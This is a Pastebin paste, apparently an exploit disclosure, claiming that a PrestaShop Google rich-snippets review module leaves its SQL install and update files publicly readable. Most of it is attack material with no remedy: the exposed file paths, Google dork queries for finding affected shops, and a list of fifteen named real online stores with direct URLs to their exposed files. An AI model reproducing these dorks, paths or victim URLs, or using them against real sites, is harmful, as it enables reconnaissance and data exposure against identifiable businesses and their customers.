API tools faq
paste
KingSkrupellos

PrestaShop Google GSnippetsReviews 1.6.1.4 Database Disc

KingSkrupellos
Dec 23rd, 2018
77
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.05 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : PrestaShop Google GSnippetsReviews Modules 1.6.1.4 Database Backup Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 24/12/2018
  6. # Vendor Homepage : prestashop.com
  7. # Software Download Link : addons.prestashop.com/en/seo-natural-search-engine-optimization/
  8. 6144-customer-ratings-and-reviews-pro-google-rich-snippets.html
  9. + sourceforge.net/projects/prestashopratingreview/
  10. + codecanyon.net/item/prestashop-products-review-google-rich-snippets-module/20545945
  11. + storeprestamodules.com/prestashop-modules-google-snippets-product-reviews.html
  12. # Software Price : 100 Euro
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Version Information : 1.4.11.0± - 1.4.7.0 - 1.4.6.2 - 1.5.4.0 -
  16. 1.5.6.1- 1.5.6.2 - 1.5.3.1 - 1.6.0.12± - 1.6.1.1± - 1.6.1.4±
  17. # Exploit Risk : Medium
  18. # Google Dorks : inurl:''/modules/gsnippetsreviews/sql/''
  19. intext:''© 2013 - Vinta Quatre. Tous droits réservés - Création Yellow Agence Internet''
  20. intext:''© 2018 - DECO LED VLC''
  21. intext:''Powered by e-com''
  22. intext:''© 2018 Sud Corner tous droits réservés''
  23. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  24. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  25.  
  26. ####################################################################
  27.  
  28. # Exploit :
  29.  
  30. /modules/gsnippetsreviews/sql/install.sql
  31.  
  32. /modules/gsnippetsreviews/sql/uninstall.sql
  33.  
  34. /modules/gsnippetsreviews/sql/update-date-rating.sql
  35.  
  36. /modules/gsnippetsreviews/sql/update-lang-review.sql
  37.  
  38. /modules/gsnippetsreviews/sql/update-voucher-fb.sql
  39.  
  40. ###################################################################
  41.  
  42. # Example Vulnerable Sites =>
  43.  
  44. [+] vinta-quatre.com/modules/gsnippetsreviews/sql/uninstall.sql
  45.  
  46. [+] himmelslaternen.ch/modules/gsnippetsreviews/sql/install.sql
  47.  
  48. [+] decoledvalencia.com/modules/gsnippetsreviews/sql/install.sql
  49.  
  50. [+] cactose-boutique.fr/modules/gsnippetsreviews/sql/install.sql
  51.  
  52. [+] kakicrazy.fr/modules/gsnippetsreviews/sql/install.sql
  53.  
  54. [+] originalveniceshop.com/modules/gsnippetsreviews/sql/update-date-rating.sql
  55.  
  56. [+] sudcorner.com/modules/gsnippetsreviews/sql/update-lang-review.sql
  57.  
  58. [+] cobureau.net/modules/gsnippetsreviews/sql/update-voucher-fb.sql
  59.  
  60. [+] mondo-bougies.com/modules/gsnippetsreviews/sql/update-date-rating.sql
  61.  
  62. [+] rygeshop.dk/modules/gsnippetsreviews/sql/update-voucher-fb.sql
  63.  
  64. [+] nsbconcept.com/modules/gsnippetsreviews/sql/update-date-rating.sql
  65.  
  66. [+] ventiladorestecho.net/modules/gsnippetsreviews/sql/uninstall.sql
  67.  
  68. [+] mediaperfect.fr/shop/modules/gsnippetsreviews/sql/install.sql
  69.  
  70. [+] tu-instrumento.com.ar/modules/gsnippetsreviews/sql/update-voucher-fb.sql
  71.  
  72. [+] multicouche-et-accessoires.fr/modules/gsnippetsreviews/sql/update-date-rating.sql
  73.  
  74. ####################################################################
  75.  
  76. # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
  77.  
  78. ####################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!